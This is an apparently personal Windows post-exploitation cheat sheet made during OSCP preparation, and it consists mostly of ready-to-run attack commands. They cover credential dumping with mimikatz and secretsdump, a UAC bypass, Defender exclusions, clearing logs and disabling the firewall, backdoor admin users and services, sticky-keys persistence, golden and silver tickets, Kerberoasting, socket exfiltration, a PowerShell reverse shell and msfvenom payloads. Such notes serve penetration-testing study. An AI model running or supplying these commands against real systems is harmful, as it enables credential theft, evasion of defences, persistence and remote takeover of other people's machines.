|\ __________                          __   __                         __
         | |   __     |          _____ __    __\__/_|  |_ __ ___   _____   ___ |  |\_____     
         | |  /  \    |         /  _  \  \  /  /  |_    _|  /   \ /  _  \ /  _ \  |/  _  \    
         | |  \  /___ |        /  /_\  \  \/  /|  | |  |\|   /\  \  / \  \  / \   |  /_\  \   
         | |__/    _ \|        |  _____||    |\|  | |  | |  |\|  |  |\|  |  |\|   |  _____|\  
         | |___/\  \\_\        \  \____/  /\  \|  | |  | |  | |  |  \_/  /  \_/   |  \___ \|  
         | |    /   \_|         \_____/__/ /\__\__| |__| |__| |__|\_____/ \____/__|\_____/\   
         | |   / / \___|         \____\__\/  \__\__\|\__\|\__\|\__\\____\/ \___\\__\\____\/   
         | |__/_/_____|     

Last changed: 08.07.2020

Windows post exploitation

This is another part of my notes I started to collect during my Offensive Security Certified Professional exam peparations.

A nice collection of further red teaming procedures can be found on https://ired.team/.

login information


whoami /all
net user %username%

logged in users

query user

record user behaviour

psr /start /gui 0 /output record.zip
psr /stop

system information

version and service pack info


environment variables



net config workstation
reg query hklm\system\currentcontrolset\services\tcpip\parameters /v hostname

running tasks

tasklist /V
tasklist /svc
taskkill /pid 1234
Get-Process -IncludeUserName | Select-Object Id,{$_.Parent.Id},UserName,Name
Stop-Process -Name evil.exe -Force

open files

openfiles /local on
openfiles /query

event logs

wevtutil query-events Security /c:10 /f:text
wevtutil clear-log Security

installed software

wmic product get name,vendor,version

uninstall security update

wusa /uninstall /kb:1234567 /quiet /norestart

group policies

gpresult /user victim /z > user_gpo.txt
gpresult /user victim /scope computer /z > computer_gpo.txt
nbtstat -n
nltest /dclist:target.domain
dir \\<DC>\SYSVOL\
robocopy /e \\<DC>\SYSVOL\<target.domain>\Policies .


Get-ChildItem env:

user management

usernames and privileges

net user
net user /domain
[adsi]"WinNT://$env:userdomain/$env:username,user" | select *
net localgroup
net user Administrator new_password /active:yes

create new admin user

net user admin password /add
net localgroup administrators admin /add

uac bypass

reg add "hkcu\software\classes\mscfile\shell\open\command" /t REG_SZ /d "c:\windows\system32\cmd.exe /c whoami /priv > c:\bypass.txt" /f
reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c notepad.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f 

windows defender

Recent versions of Windows make it quite hard to disable windows defender. An easy alternative is to add an exclusion for a specific folder. This should persist a reboot.

exclude folders

powershell.exe Add-MpPreference -ExclusionPath C:\Users\victim\, 'C:\Program Files\'
powershell.exe Get-MpPreference | fl ExclusionPath
powershell.exe Remove-MpPreference -ExclusionPath C:\Users\victim\, 'C:\Program Files\'

hash extraction

lsass process

wce.exe -d

lsass process (meterpreter)

run post/windows/gather/hashdump

lsass process (mimikatz)

To get a list of available modules enter :: in mimikatz.

sekurlsa::pth /user:Administrator /domain:. /ntlm:<admin-hash>

lsass core dump (mimikatz)

procdump -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonPasswords" exit


To dump hashes of local accounts from the registry pwdump and cachedump from creddump7 or secretsdump from Impacket can be used.

reg save hklm\sam c:\SAM
reg save hklm\system c:\SYSTEM
reg save hklm\security c:\SECURITY
cachedump SYSTEM SECURITY True
secretsdump.py -sam SAM -system SYSTEM -securty SECURITY LOCAL

user privileges

If you want to extract the hash of the current user without administrator privileges you can use inveigh and create a local http server which will dump the NetNTLMv2 authentication data

. .\inveigh.ps1
invoke-inveigh -llmnr n
"C:\Program Files\Internet Explorer\iexplore.exe" "http://localhost/"
get-inveigh -ntlmv2

domain controller

To extract password hashes from an active directory you will need the file ntds.dit and the SYSTEM registry hive from the domain controller. The location of the ntds.dit can be found in the registry.

reg query hklm\system\currentcontrolset\services\ntds\parameters

Impacket can extract the hashes in one step

secretsdump.py -ntds ntds.dit -system SYSTEM -just-dc-ntlm LOCAL > hashes.txt

group policiy preferences

Sometimes you can find encrypted passwords in scheduled tasks configured via group policies

findstr /S /I cpassword \\<DC>\sysvol\<target.domain>\policies\*.xml

The cpassword is encrypted with a well known 32-byte AES key

4e 99 06 e8  fc b6 6c c9  fa f4 93 10  62 0f fe e8
f4 96 e8 06  cc 05 79 90  20 9b 09 a4  33 b6 6c 1b

PowerSploit offers a script to search and decrypt these passwords.

Get-GPPassword.ps1 -Server <DC>

enable wdigest cleartext password storage

reg add hklm\system\currentcontrolset\control\securityproviders\wdigest /v UseLogonCredential /t REG_DWORD /d 1 /f

network configuration

network interfaces

ipconfig /all
netsh int ip set address "local area connection" static

modify routes

route print
route add mask

domain controller

set logon
set userdnsdomain
set userdomain
nltest /dsgetdc:<DOMAIN>
nltest /dclist:<DoMAIN>

dns requests

nslookup hostname
for /L %i in (1,1,254) do nslookup "<IP-PREFIX>.%i" | findstr "Name:"

trace route

tracert host

open ports

netstat -nabo

enable IP forwarding

reg add hklm\system\currentcontrolset\services\remoteaccess \v Start \t REG_DWORD \d 2 \f
sc start remoteaccess

port forwarding

netsh in portproxy add v4tov4 listenport=8080 connectaddress= connectport=80

disable firewall

netsh firewall set opmode disable
netsh advfirewall set allprofiles state off


PsExec64.exe -accepteula \\dc1 -u Administrator -p SecretPassword123 cmd
PsExec64.exe -accepteula \\dc1 -s cmd

enable remote desktop

reg add "hklm\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
netsh advfirewall firewall show rule name=all | find /i "remote" | find /i "desktop"
netsh advfirewall firewall set rule group="remote desktop" new enable=yes

login (from linux)

xfreerdp /u:user /p:password /v:<target>

download file

certutil.exe -urlcache -split -f "" t.zip

As certutil.exe is known to be used by malicious actors you should prefer powershell.

(New-Object Net.WebClient).DownloadString("")
(New-Object Net.WebClient).DownloadFile("", "t.zip")
Expand-Archive t.zip .

In powershell > 3.0 you can use Invoke-WebRequest.

(Invoke-WebRequest -UseBasicParsing -Uri
Invoke-WebRequest -UseBasicParsing -Uri -OutFile t.exe -Method POST -Body @{auth='password'}

Short version:

(iwr > t.exe

tcp sockets with powershell

[IO.StreamReader]::new(([Net.Sockets.TcpClient]::new('', 12345)).GetStream()).ReadLine() > file.txt
gc filename.zip -raw | % {$s=[IO.StreamWriter]::new(([Net.Sockets.TcpClient]::new('', 12345)).GetStream());$s.Write($_);$s.Flush();$s.Dispose()}

file system

list disks

wmic logicaldisk get filesystem,freespace,name,size,volumename


type file.txt | find /n /i "string"
dir /s /r | find ":$DATA"
forfiles /p c:\users /s /m *.exe /c "cmd /c echo @fdate @ftime @fsize @file"
attrib /S /D


(Get-ChildItem c:\ -Recurse -File *.zip).VersionInfo.FileName
Get-ChildItem c:\ -Recurse | Select-String "password" | Group Path | Select Name
Get-Content file.txt | Select-String -Pattern "^FAIL" -CaseSensitive

volume shadow copy

Windows Server allows invoking shadow copies via vssadmin. This can help to copy files which are locked for reading.

vssadmin create shadow /for=c:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM SYSTEM.bak
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit ntds.bak

disable bitlocker

manage-bde -status
manage-bde -off c:

scheduled tasks

list tasks


create task

schtasks /create /sc minute /tn test /tr cmd.exe
schtasks /run /tn test
schtasks /delete /tn test /f


list services

sc query

create service

sc create new_service binpath= "cmd /K start c:\backdoor.exe" start=auto error=ignore
sc qc new_service

modify service

sc config new_service binpath= "cmd /K start c:\new_backdoor.exe"
sc start new_service

windows network

netbios discovery (from linux)

nbtscan -v
nmblookup -A <target>
nmap --script smb-enum-users.nse
nmap --script "smb-vuln*"
rpcclient -U ""

netbios discovery (from windows)

nbtstat -A <target>
net view <target>


rpcclient -U user
$> srvinfo
$> enumdomains
$> enumdomusers

server message block

smb file share

net share
net share test=c:\test
net use x: \\<target>\test
net use x: /delete
net share test /delete

mount share in linux

smbclient -L target -U '' -N
smbclient //target/share -U '' -N -c dir
smbclient //target/share -U '' -N -c 'cd docs; get secret.txt'
smbclient //target/share -U '' -N -c 'mkdir tmp; cd tmp; put evil.exe'
nmap --script smb-enum-shares share.wey-tech.com -p 445
mount -t cifs //<target>/test /mnt/cifs -o username=user

create smb server in linux

Impacket contains a simple smb server script.

python smbserver.py share /tmp/share
impacket-smbserver share /tmp/share

remote command execution

psexec -accepteula -u Administrator -p password //<target> <command>
winexe -U Administrator%password //<target> <command>
rpcclient -U Administrator <target>

extract NetNTMLv2 credentials from pcap

With NTLMssp-Extract you can extract all captured NetNTLMv2 authentications in hashcat or JohnTheRipper compatible format.

ntlmssp_extract.py -f 0 -p smb.pcap

windows domain

join domain

Needs local administrator privileges and valid user credentials for the domain.

add-computer -domainname target -credential user_xy -restart
remove-computer -unjoindomaincredential user_xy -restart

join organisational unit

import-module .\powersploit\Recon\Recon.psm1
get-netdomaincontroller -domain target -credential user_xy
get-netou -domaincontroller dc1.target.com -credential user_xy -fulldata
add-computer -domainname target -oupath "OU=Domain Controllers,DC=target,DC=com" -newname dc2 -credential user_xy

pass the ticket

klist tgt
klist purge

To export and reuse tickets in a Pass-The-Ticket attack you can use mimikatz

cd %temp%
sekurlsa::tickets /export
kerberos::ptt [...]...-Administrator@krbtgt-target.com.kirbi

If there is no TGT available maybe a service ticket can be found and reused for that specific service.

golden ticket

To acquire the hash of the krbtgt service you will need domain administrator privileges. With these you can copy the ntds.dit (see above) or use mimikatz

lsadump::dcsync /domain:target.com /user:krbtgt

With this information anyone can create a TGT containing the SID of the domain administrator (-500) and use it in a Pass-The-Ticket attack.

kerberos::golden /domain:target.com /sid:<DOMAIN_SID> /rc4:<NTLM_HASH> /user:whatever

If a nonexistent username is chosen the TGT will become invalid after 20 minutes.

silver ticket

If you have the ntlm hash of a machine account you can create service tickets for the services running on the machine.

kerberos::golden /domain:target.com /sid:<DOMAIN_SID> /rc4:<NTLM_HASH /user:whatever /target:fileserver.target.com /service: cifs /ptt

Machine account passwords can be extracted from the registry

lsadump.py SYSTEM SECURITY true
secretsdump.py -system SYSTEM -security SECURITY LOCAL

You will need the ntlm hash from the machine account plaintext password.

echo <PLAINTEXT_PASSWORD> | sed 's/../\\x&/g'
perl -e 'use Digest::MD4 "md4_hex"; print md4_hex("<ESCAPED_HEX_STRING>")."\n";'


Sometimes services are not associated to a machine account but to a dedicated service logon account. If a weak password is setup for this service logon account it can be optained by cracking an encrypted service ticket. This can be done with user privileges.

setspn -T infected -Q */* | select-string -pattern "CN=User|CN=Managed" -context 0,1
$Null = [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel')
$Ticket = New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -argumentlist "IIS/server.target.com:80"
$TicketHexStream = [System.BitConverter]::ToString($Ticket.GetRequest()) -replace "-"
[System.Collections.ArrayList]$Parts = ($TicketHexStream -replace '^(.*?)04820...(.*)','$2') -Split "A48201"
$Parts.RemoveAt($Parts.Count - 1)
$CipherText = $Parts -join "A48201"
$Hash = "$($CipherText.Substring(0,32))`$$($CipherText.Substring(32))"
$HashFormat = "`$krb5tgs`$23`$*`$IIS-Account`$target.com`$IIS/server.target.com:80*`$$Hash"

The hash should have the format $krb5tgs$<ETYPE>$*<ACCOUNT>$<DOMAIN>$<SPN>*$<HASH>. It can be cracked with hashcat

hashcat -m 13100 hashfile wordlist

Alternatviely you can run Invoke-Kerberoast.ps1 from the EmpireProject to acquire the hash in one go.


The Windows Data Protection API (dpapi) offers transparent methods for encrypted storage of data. If you want to decrypt this data mimikatz can be used.

dpapi::protect /data:"testdata" /out:"blob.bin"
dpapi::blob /in:"blob.bin" /unprotect

The password used to protect a masterkey can be cracked.

attrib /S %appdata%\microsoft\protect\*
dpapi::blob /in:"blob.bin"
dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<SID>\<MASTERKEY_FILE>"

Hashcat supports encrypted masterkeys in the following format:

    VERSION:        1=des3+sha1; 2=aes256+sha512
    CONTEXT:        1=local; 2=domain
    ENC_METHOD:     des3 || aes256
    HASH_ALG:       sha1 || sha512
    ENC_KEY_LEN:    208 || 288

hashcat -m 15900 dpapi_mk_v2.hash wordlist -O

With the cracked password the masterkey and with it the dpapi blob can be decrypted.

dpapi::masterkey /in:"%appdata%\Microsoft\Protect\<SID>\<MASTERKEY_FILE>" /sid:<SID> /password:<PASSWORD>
dpapi::blob /in:"blob.bin" /masterkey:<MASTERKEY>

parsing outlook mailbox

The libpst package contains tools for converting outlook .pst files

readpst -o extracted_mails mailbox.pst

persistent login bypass

sticky key

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f

ease of access

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f

backconnect shell


$client = New-Object System.Net.Sockets.TCPClient("",80);
$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
    ;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
    $sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";
    $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);

metasploit hta_server

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f hta-psh > shell.hta

metasploit smb_delivery

c:\\windows\\system32\\rundll32.exe \\\\\\share\\file_name.dll,0

Other methods can be found on hacktricks.xyz.

hiding file extension



applocker bypass


c:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe inline_task.csproj

unsafe DLL loading

procmon.exe (SysinternalsSuite)

Result is "NAME NOT FOUND"      (-> Include)
Path ends with ".dll"           (-> Include)
Path begins with "c:\windows"   (-> Exclude)
Path begins with "c:\program"   (-> Exclude)